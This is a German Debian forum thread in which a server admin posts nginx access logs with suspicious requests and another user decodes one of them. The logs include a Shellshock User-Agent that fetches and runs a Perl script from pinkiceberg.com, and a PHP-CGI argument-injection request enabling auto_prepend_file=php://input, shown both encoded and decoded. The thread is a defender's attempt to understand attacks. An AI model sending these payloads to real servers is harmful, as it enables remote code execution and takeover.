ZeroDay und noch was komisches in den NGINX LOGs

Debian macht sich hervorragend als Web- und Mailserver. Schau auch in den " Tipps und Tricks"-Bereich.
Antworten
steintasse
Beiträge: 31
Registriert: 26.11.2013 18:42:38

ZeroDay und noch was komisches in den NGINX LOGs

Beitrag von steintasse » 19.08.2016 16:33:11

Guten Tag Nginx spuckt bei mir in den Logs beunruhigende Dinge aus. Zu meinem System erst mal ich nutze Debian 7, nginx 1.2.1 und PHP 5.6.24-1~dotdeb+7.1 (fpm-fcgi) (built: Jul 21 2016 23:28:37)
Zero-Day sollte mir also nichts anhaben. Nur leider gibt es in den LOG Dateien noch einige Einträge die ich nicht nachvollziehen kann. Ich weiß einfach nicht in welcher Codierung die scheinbaren Befehle codiert wurden 8O Von 180.97.106.37 z.B. Nginx verwaltet bei mir vier virtuelle Webserver und in drei gings die letzten Zwei Tage ziemlich ab. Zur Sicherheit hab ich meinen Vserver runtergefahren.

/var/log/nginx_access.log

Code: Alles auswählen

89.237.75.243 - - [18/Aug/2016:05:08:39 +0200] "GET / HTTP/1.0" 301 178 "-" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)"
180.97.106.37 - - [18/Aug/2016:05:40:06 +0200] "GET hxxp://180.163.113.82/check_proxy HTTP/1.1" 301 178 "-" "-"
157.55.39.223 - - [18/Aug/2016:05:44:10 +0200] "GET / HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +hxxp://www.bing.com/bingbot.htm)"
123.52.44.254 - - [18/Aug/2016:06:02:22 +0200] "OPTIONS /ipc$ HTTP/1.1" 301 178 "-" "Microsoft-WebDAV-MiniRedir/6.1.7601"
136.243.48.85 - - [18/Aug/2016:06:04:16 +0200] "GET / HTTP/1.1" 301 178 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36"
66.249.69.61 - - [18/Aug/2016:06:20:15 +0200] "GET /robots.txt HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +hxxp://www.google.com/bot.html)"
66.249.69.61 - - [18/Aug/2016:06:20:16 +0200] "GET / HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +hxxp://www.google.com/bot.html)"
66.249.76.88 - - [18/Aug/2016:06:20:17 +0200] "GET / HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +hxxp://www.google.com/bot.html)"
46.119.117.90 - - [18/Aug/2016:06:31:39 +0200] "GET / HTTP/1.1" 301 178 "hxxp://eupornstar.info/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)"
46.119.117.90 - - [18/Aug/2016:06:31:39 +0200] "GET / HTTP/1.1" 301 178 "hxxp://eupornstar.info/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)"
134.249.65.218 - - [18/Aug/2016:06:35:53 +0200] "GET / HTTP/1.1" 301 178 "hxxp://education-cz.ru/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)"
134.249.65.218 - - [18/Aug/2016:06:35:54 +0200] "GET / HTTP/1.1" 301 178 "hxxp://education-cz.ru/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)"
134.249.65.218 - - [18/Aug/2016:06:35:55 +0200] "GET / HTTP/1.1" 301 178 "hxxp://education-cz.ru/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)"
91.196.50.33 - - [18/Aug/2016:07:06:13 +0200] "GET hxxp://testp1.piwo.pila.pl/testproxy.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/31.0"
180.76.15.150 - - [18/Aug/2016:07:46:22 +0200] "GET / HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +hxxp://www.baidu.com/search/spider.html)"
157.55.39.223 - - [18/Aug/2016:08:33:29 +0200] "GET / HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +hxxp://www.bing.com/bingbot.htm)"
199.166.28.30 - - [18/Aug/2016:10:13:19 +0200] "GET / HTTP/1.1" 301 178 "-" "=Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16"
93.125.99.50 - - [18/Aug/2016:10:28:10 +0200] "GET /js/mage/cookies.js HTTP/1.1" 301 178 "best-bc.de" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4"
212.83.162.138 - - [18/Aug/2016:10:29:41 +0200] "HEAD /robots.txt HTTP/1.0" 301 0 "-" "-"
180.141.91.205 - - [18/Aug/2016:11:07:03 +0200] "OPTIONS /ipc$ HTTP/1.1" 301 178 "-" "Microsoft-WebDAV-MiniRedir/6.1.7601"
111.253.147.86 - - [18/Aug/2016:11:07:10 +0200] "OPTIONS /ipc$ HTTP/1.1" 301 178 "-" "Microsoft-WebDAV-MiniRedir/6.1.7601"
[b]176.94.194.90 - - [18/Aug/2016:11:15:16 +0200] "POST /%70%68%70%70%61%74%68/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69 %6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%6 4%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +hxxp://www.google.com/bot.html)"[/b]
136.243.48.85 - - [18/Aug/2016:11:32:39 +0200] "GET / HTTP/1.1" 301 178 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36"
192.99.144.140 - - [18/Aug/2016:11:46:04 +0200] "PROPFIND /webdav/ HTTP/1.1" 301 178 "-" "WEBDAV Client"
169.229.3.91 - - [18/Aug/2016:12:03:45 +0200] "\xFA\xD2\x1Ba\x05-\xE4\x9E\xA57\xC2\xF4x\x8AK\xCB\xA8`6\xEA\xD7\xFCl-|\xD6\x15\x86\xC7\xE2I@\xC8y\xF8\xB57\xEFe\xF2\x19\x8A\xA8\x17/\xC85\xB2\x91}\xC9Y\x8EB^\xA3\x9A\x07\xA9\x80N=\x95&" 400 166 "-" "-"
180.76.15.152 - - [18/Aug/2016:12:26:32 +0200] "GET / HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +hxxp://www.baidu.com/search/spider.html)"
46.118.159.110 - - [18/Aug/2016:12:41:00 +0200] "GET / HTTP/1.1" 301 178 "hxxp://tver.xrus.org/" "Mozilla/4.0 (compatible; MSIE 4.01; Digital AlphaServer 1000A 4/233; Windows NT; Powered By 64-Bit Alpha Processor)"
46.118.159.110 - - [18/Aug/2016:12:41:01 +0200] "GET / HTTP/1.1" 301 178 "hxxp://tver.xrus.org/" "Mozilla/4.0 (compatible; MSIE 4.01; Digital AlphaServer 1000A 4/233; Windows NT; Powered By 64-Bit Alpha Processor)"
[b]180.97.106.37 - - [18/Aug/2016:12:58:45 +0200] "\x04\x01\x00P\xB4\xA3qR\x00" 400 166 "-" "-"[/b]
114.39.108.80 - - [18/Aug/2016:13:01:39 +0200] "OPTIONS /ipc$ HTTP/1.1" 301 178 "-" "Microsoft-WebDAV-MiniRedir/6.1.7601"
66.249.76.88 - - [18/Aug/2016:13:10:25 +0200] "GET / HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +hxxp://www.google.com/bot.html)"
157.55.39.205 - - [18/Aug/2016:13:55:50 +0200] "GET /impressum.html HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +hxxp://www.bing.com/bingbot.htm)"
46.119.117.90 - - [18/Aug/2016:15:23:25 +0200] "GET / HTTP/1.1" 301 178 "hxxp://confib.ifmo.ru/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 9.0"
46.119.117.90 - - [18/Aug/2016:15:23:25 +0200] "GET / HTTP/1.1" 301 178 "hxxp://interesnie-faktu.ru/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 9.0"
46.119.117.90 - - [18/Aug/2016:15:23:25 +0200] "GET / HTTP/1.1" 301 178 "hxxp://confib.ifmo.ru/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 9.0"
46.119.117.90 - - [18/Aug/2016:15:23:25 +0200] "GET / HTTP/1.1" 301 178 "hxxp://interesnie-faktu.ru/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 9.0"
46.119.117.90 - - [18/Aug/2016:15:23:25 +0200] "GET / HTTP/1.1" 301 178 "hxxp://confib.ifmo.ru/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 9.0"
[b]46.119.117.90 - - [18/Aug/2016:15:23:25 +0200] "GET / HTTP/1.1" 301 178 "hxxp://interesnie-faktu.ru/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 9.0"
180.97.106.37 - - [18/Aug/2016:15:34:15 +0200] "\x05\x02\x00\x02" 400 166 "-" "-"[/b]
138.201.30.66 - - [18/Aug/2016:15:43:52 +0200] "GET /robots.txt HTTP/1.0" 301 178 "-" "Mozilla/5.0 (compatible; SEOkicks-Robot; +hxxp://www.seokicks.de/robot.html)"
138.201.30.66 - - [18/Aug/2016:15:43:54 +0200] "GET / HTTP/1.0" 301 178 "-" "Mozilla/5.0 (compatible; SEOkicks-Robot; +hxxp://www.seokicks.de/robot.html)"
45.79.111.169 - - [18/Aug/2016:15:44:04 +0200] "GET / HTTP/1.1" 301 178 "hxxp://uptime.com/bestbc.de" "Mozilla/5.0 (compatible; Uptimebot/0.2.35; +hxxp://www.uptime.com/uptimebot)"
95.128.43.164 - - [18/Aug/2016:16:03:58 +0200] "GET / HTTP/1.1" 301 178 "hxxp://burger-imperia.com/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36"
91.196.50.33 - - [18/Aug/2016:16:07:51 +0200] "GET hxxp://testp4.pospr.waw.pl/testproxy.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/31.0"
66.249.76.88 - - [18/Aug/2016:16:11:57 +0200] "GET / HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +hxxp://www.google.com/bot.html)"
157.55.39.223 - - [18/Aug/2016:16:19:39 +0200] "GET /projekte/aktuell/sellnews HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +hxxp://www.bing.com/bingbot.htm)"
157.55.39.223 - - [18/Aug/2016:16:19:39 +0200] "GET /projects.htm HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +hxxp://www.bing.com/bingbot.htm)"
157.55.39.16 - - [18/Aug/2016:16:19:44 +0200] "GET /index.php?lang=de HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +hxxp://www.bing.com/bingbot.htm)"
157.55.39.205 - - [18/Aug/2016:16:19:48 +0200] "GET /weihnachten HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +hxxp://www.bing.com/bingbot.htm)"
157.55.39.205 - - [18/Aug/2016:16:19:48 +0200] "GET /projekt-scouts.html HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +hxxp://www.bing.com/bingbot.htm)"
188.138.41.209 - - [19/Aug/2016:05:31:19 +0200] "GET / HTTP/1.1" 301 178 "-" "Mozilla/5.0 (X11; U; Linux Core i7-4980HQ; de; rv:32.0; compatible; JobboerseBot; hxxp://www.jobboerse.com/bot.htm) Gecko/20100101 Firefox/38.0"
188.138.41.209 - - [19/Aug/2016:05:32:09 +0200] "GET /robots.txt HTTP/1.1" 301 178 "-" "Mozilla/5.0 (X11; U; Linux Core i7-4980HQ; de; rv:32.0; compatible; JobboerseBot; hxxp://www.jobboerse.com/bot.htm) Gecko/20100101 Firefox/38.0"
188.138.41.209 - - [19/Aug/2016:05:32:11 +0200] "GET / HTTP/1.1" 301 178 "-" "Mozilla/5.0 (X11; U; Linux Core i7-4980HQ; de; rv:32.0; compatible; JobboerseBot; hxxp://www.jobboerse.com/bot.htm) Gecko/20100101 Firefox/38.0"
188.138.41.209 - - [19/Aug/2016:05:32:19 +0200] "GET / HTTP/1.1" 301 178 "-" "Mozilla/5.0 (X11; U; Linux Core i7-4980HQ; de; rv:32.0; compatible; JobboerseBot; hxxp://www.jobboerse.com/bot.htm) Gecko/20100101 Firefox/38.0"
188.138.41.209 - - [19/Aug/2016:05:32:19 +0200] "GET /favicon.ico HTTP/1.1" 301 178 "-" "Mozilla/5.0 (X11; U; Linux Core i7-4980HQ; de; rv:32.0; compatible; JobboerseBot; hxxp://www.jobboerse.com/bot.htm) Gecko/20100101 Firefox/38.0"
188.138.41.209 - - [19/Aug/2016:05:32:21 +0200] "GET / HTTP/1.1" 301 178 "-" "Mozilla/5.0 (X11; U; Linux Core i7-4980HQ; de; rv:32.0; compatible; JobboerseBot; hxxp://www.jobboerse.com/bot.htm) Gecko/20100101 Firefox/38.0"
157.55.39.223 - - [19/Aug/2016:05:39:11 +0200] "GET / HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +hxxp://www.bing.com/bingbot.htm)"
104.128.144.131 - - [19/Aug/2016:08:35:45 +0200] "GET / HTTP/1.0" 301 178 "-" "www.probethenet.com scanner"
104.128.144.131 - - [19/Aug/2016:08:35:45 +0200] "HEAD /redirect.php HTTP/1.0" 301 0 "-" "www.probethenet.com scanner"
134.249.51.75 - - [19/Aug/2016:10:00:44 +0200] "GET / HTTP/1.1" 301 178 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
185.25.151.159 - - [19/Aug/2016:10:25:35 +0200] "GET hxxp://testp1.piwo.pila.pl/testproxy.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/31.0"
192.99.144.140 - - [19/Aug/2016:10:31:29 +0200] "PROPFIND /webdav/ HTTP/1.1" 301 178 "-" "WEBDAV Client"
139.162.13.205 - - [19/Aug/2016:11:31:44 +0200] "GET / HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36"
192.99.238.190 - - [19/Aug/2016:12:04:18 +0200] "GET /w00tw00t.at.ISC.SANS.DFind HTTP/1.1" 400 166 "-" "-"
192.99.238.190 - - [19/Aug/2016:12:05:48 +0200] "GET /w00tw00t.at.ISC.SANS.DFind HTTP/1.1" 400 166 "-" "-

access_log /var/log/nginx/nginx_git_access.log;
Der Webserver hat im grunde nur zwei Git Repositorys verwaltet die man Clonen konnte.

Code: Alles auswählen

71.6.135.131 - - [18/Aug/2016:09:21:00 +0200] "GET / HTTP/1.1" 404 564 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/537.36"
71.6.135.131 - - [18/Aug/2016:09:21:01 +0200] "-" 400 0 "-" "-"
71.6.135.131 - - [18/Aug/2016:09:21:02 +0200] "-" 400 0 "-" "-"
71.6.135.131 - - [18/Aug/2016:09:21:02 +0200] "-" 400 0 "-" "-"
71.6.135.131 - - [18/Aug/2016:09:21:02 +0200] "-" 400 0 "-" "-"
71.6.135.131 - - [18/Aug/2016:09:21:03 +0200] "" 400 0 "-" "-"
71.6.135.131 - - [18/Aug/2016:09:21:03 +0200] "" 400 0 "-" "-"
71.6.135.131 - - [18/Aug/2016:09:21:04 +0200] "-" 400 0 "-" "-"
71.6.135.131 - - [18/Aug/2016:09:21:04 +0200] "" 400 0 "-" "-"
71.6.135.131 - - [18/Aug/2016:09:21:04 +0200] "-" 400 0 "-" "-"
71.6.135.131 - - [18/Aug/2016:09:21:05 +0200] "-" 400 0 "-" "-"
71.6.135.131 - - [18/Aug/2016:09:21:08 +0200] "quit" 400 166 "-" "-"
71.6.135.131 - - [18/Aug/2016:09:21:10 +0200] "" 400 0 "-" "-"
71.6.135.131 - - [18/Aug/2016:09:21:11 +0200] "-" 400 0 "-" "-"
[b]220.202.123.178 - - [18/Aug/2016:12:31:21 +0200] "GET / HTTP/1.1" 404 162 "-" "Python-urllib/2.6"
220.202.123.178 - - [18/Aug/2016:12:31:24 +0200] "-" 400 0 "-" "-"
220.202.123.178 - - [18/Aug/2016:12:31:32 +0200] "GET / HTTP/1.1" 400 264 "-" "Python-urllib/2.6"
220.202.123.178 - - [18/Aug/2016:12:31:33 +0200] "GET / HTTP/1.1" 400 264 "-" "() { :;}; /bin/bash -c \x22wget -qO - hxxp://pinkiceberg.com/.mail | perl ; cd /tmp ; curl -O hxxp://pinkiceberg.com/.mail ; fetch hxxp://pinkiceberg.com/.mail ; perl .mail ;rm -rf .mail* \x22"[/b]
Das sieht besonders unschön aus.

/etc/nginx/include# cat /var/log/nginx/nginx_devi_access.log

Code: Alles auswählen

148.243.30.82 - - [18/Aug/2016:05:19:13 +0200] "-" 400 0 "-" "-"
148.243.30.82 - - [18/Aug/2016:05:19:14 +0200] "\x00\x00\x00\x85\xFFSMBr\x00\x00\x00\x00\x18S\xC8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFE\x00\x00\x00\x00\x00b\x00\x02PC NETWORK PROGRAM 1.0\x00\x02LANMAN1.0\x00\x02Windows for Workgroups 3.1a\x00\x02LM1.2X002\x00\x02LANMAN2.1\x00\x02NT LM 0.12\x00" 400 166 "-" "-"
123.52.44.254 - - [18/Aug/2016:06:02:20 +0200] "-" 400 0 "-" "-"
123.52.44.254 - - [18/Aug/2016:06:02:21 +0200] "\x00\x00\x00\x9B\xFFSMBr\x00\x00\x00\x00\x18S\xC8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFF\xFF\xFE\x00\x00\x00\x00\x00x\x00\x02PC NETWORK PROGRAM 1.0\x00\x02LANMAN1.0\x00\x02Windows for Workgroups 3.1a\x00\x02LM1.2X002\x00\x02LANMAN2.1\x00\x02NT LM 0.12\x00\x02SMB 2.002\x00\x02SMB 2.???\x00" 400 166 "-" "-"
120.192.167.26 - - [18/Aug/2016:07:07:13 +0200] "-" 400 0 "-" "-"
120.192.167.26 - - [18/Aug/2016:07:07:19 +0200] "\x00\x00\x00\x85\xFFSMBr\x00\x00\x00\x00\x18S\xC8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFE\x00\x00\x00\x00\x00b\x00\x02PC NETWORK PROGRAM 1.0\x00\x02LANMAN1.0\x00\x02Windows for Workgroups 3.1a\x00\x02LM1.2X002\x00\x02LANMAN2.1\x00\x02NT LM 0.12\x00" 400 166 "-" "-"
115.236.28.130 - - [18/Aug/2016:08:02:07 +0200] "\x00\x00\x00\x85\xFFSMBr\x00\x00\x00\x00\x18S\xC8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFE\x00\x00\x00\x00\x00b\x00\x02PC NETWORK PROGRAM 1.0\x00\x02LANMAN1.0\x00\x02Windows for Workgroups 3.1a\x00\x02LM1.2X002\x00\x02LANMAN2.1\x00\x02NT LM 0.12\x00" 400 166 "-" "-"
114.215.198.162 - - [18/Aug/2016:08:53:59 +0200] "-" 400 0 "-" "-"
118.233.141.190 - - [18/Aug/2016:09:06:00 +0200] "-" 400 0 "-" "-"
118.233.141.190 - - [18/Aug/2016:09:06:00 +0200] "\x00\x00\x00\x9B\xFFSMBr\x00\x00\x00\x00\x18S\xC8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFF\xFF\xFE\x00\x00\x00\x00\x00x\x00\x02PC NETWORK PROGRAM 1.0\x00\x02LANMAN1.0\x00\x02Windows for Workgroups 3.1a\x00\x02LM1.2X002\x00\x02LANMAN2.1\x00\x02NT LM 0.12\x00\x02SMB 2.002\x00\x02SMB 2.???\x00" 400 166 "-" "-"
114.39.11.207 - - [18/Aug/2016:10:18:46 +0200] "-" 400 0 "-" "-"
74.208.227.50 - - [18/Aug/2016:10:35:29 +0200] "-" 400 0 "-" "-"
74.208.227.50 - - [18/Aug/2016:10:35:30 +0200] "\x00\x00\x00\x9B\xFFSMBr\x00\x00\x00\x00\x18S\xC8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFF\xFF\xFE\x00\x00\x00\x00\x00x\x00\x02PC NETWORK PROGRAM 1.0\x00\x02LANMAN1.0\x00\x02Windows for Workgroups 3.1a\x00\x02LM1.2X002\x00\x02LANMAN2.1\x00\x02NT LM 0.12\x00\x02SMB 2.002\x00\x02SMB 2.???\x00" 400 166 "-" "-"
180.141.91.205 - - [18/Aug/2016:11:07:01 +0200] "-" 400 0 "-" "-"
180.141.91.205 - - [18/Aug/2016:11:07:02 +0200] "\x00\x00\x00\x9B\xFFSMBr\x00\x00\x00\x00\x18S\xC8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFF\xFF\xFE\x00\x00\x00\x00\x00x\x00\x02PC NETWORK PROGRAM 1.0\x00\x02LANMAN1.0\x00\x02Windows for Workgroups 3.1a\x00\x02LM1.2X002\x00\x02LANMAN2.1\x00\x02NT LM 0.12\x00\x02SMB 2.002\x00\x02SMB 2.???\x00" 400 166 "-" "-"
111.253.147.86 - - [18/Aug/2016:11:07:06 +0200] "-" 400 0 "-" "-"
111.253.147.86 - - [18/Aug/2016:11:07:07 +0200] "\x00\x00\x00\x9B\xFFSMBr\x00\x00\x00\x00\x18S\xC8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFF\xFF\xFE\x00\x00\x00\x00\x00x\x00\x02PC NETWORK PROGRAM 1.0\x00\x02LANMAN1.0\x00\x02Windows for Workgroups 3.1a\x00\x02LM1.2X002\x00\x02LANMAN2.1\x00\x02NT LM 0.12\x00\x02SMB 2.002\x00\x02SMB 2.???\x00" 400 166 "-" "-"
114.39.108.80 - - [18/Aug/2016:13:01:38 +0200] "-" 400 0 "-" "-"
114.39.108.80 - - [18/Aug/2016:13:01:39 +0200] "\x00\x00\x00\x9B\xFFSMBr\x00\x00\x00\x00\x18S\xC8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFF\xFF\xFE\x00\x00\x00\x00\x00x\x00\x02PC NETWORK PROGRAM 1.0\x00\x02LANMAN1.0\x00\x02Windows for Workgroups 3.1a\x00\x02LM1.2X002\x00\x02LANMAN2.1\x00\x02NT LM 0.12\x00\x02SMB 2.002\x00\x02SMB 2.???\x00" 400 166 "-" "-"


EDIT 2: Also bei access_log /var/log/nginx/nginx_git_access.log handelt es sich scheinbar um Shellshock aber weiter bin ich nicht gekommen :/. Auch gegen Shellshock bin ich zum Glück oder natürlich wie man es sieht scheinbar sicher :)
Zuletzt geändert von TRex am 19.08.2016 20:01:36, insgesamt 1-mal geändert.
Grund: s/quote/code/g
Nach oben
rendegast
Beiträge: 15041
Registriert: 27.02.2006 16:50:33
Lizenz eigener Beiträge: MIT Lizenz

Re: ZeroDay und noch was komisches in den NGINX LOGs

Beitrag von rendegast » 27.08.2016 02:40:35

176.94.194.90 - - [18/Aug/2016:11:15:16 +0200] "POST /%70%68%70%70%61%74%68/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69 %6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%6 4%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +hxxp://www.google.com/bot.html)"
per http://www.andre-jochim.de/url-encode.htm gibt

Code: Alles auswählen

/phppath/php?-d allow_url_include=on -d safe_mode=off -d suhosi n.simulation=on -d disable_functions="" -d open_base%6 4ir=none -d auto_prepend_file=php://input -n
169.229.3.91 - - [18/Aug/2016:12:03:45 +0200] "\xFA\xD2\x1Ba\x05-\xE4\x9E\xA57\xC2\xF4x\x8AK\xCB\xA8`6\xEA\xD7\xFCl-|\xD6\x15\x86\xC7\xE2I@\xC8y\xF8\xB57\xEFe\xF2\x19\x8A\xA8\x17/\xC85\xB2\x91}\xC9Y\x8EB^\xA3\x9A\x07\xA9\x80N=\x95&" 400 166 "-" "-"
Auf http://ddecode.com/hexdecoder/ aber nichts.
mfg rendegast
-----------------------
Viel Eifer, viel Irrtum; weniger Eifer, weniger Irrtum; kein Eifer, kein Irrtum.
(Lin Yutang "Moment in Peking")
Nach oben
Antworten

Zurück zu „Web- und Mailserver“